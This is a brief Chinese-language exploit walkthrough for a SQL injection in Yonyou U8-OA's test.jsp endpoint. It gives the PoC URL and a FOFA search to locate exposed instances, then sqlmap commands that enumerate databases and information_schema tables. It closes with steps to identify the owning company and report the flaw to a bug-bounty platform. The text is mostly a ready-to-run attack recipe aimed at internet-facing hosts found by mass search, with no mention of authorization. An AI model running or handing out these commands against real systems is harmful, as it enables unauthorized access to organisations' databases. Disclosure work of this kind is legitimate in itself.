1-漏洞POC
POC:http://IP:PORT/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
2-使用fofa搜索
title="用友U8-OA"
3-漏洞驗證
打開fofa搜索到的資產,在url中拼接poc,使用sqlmap進行探測
sqlmap語句:
c:\sqlmap>sqlmap.py -u "http://ip:port/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))" -p "S1" --batch --dbs
探測出數據庫:
探測數據表:
c:\sqlmap>sqlmap.py -u "http://ip:port/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))" -p "S1" --batch --D information_schema --tables
探測出表名:
4-通過ip反查域名、通過站長工具查詢出域名歸屬公司,通過天眼查查詢公司詳細信息,提交到漏洞盒子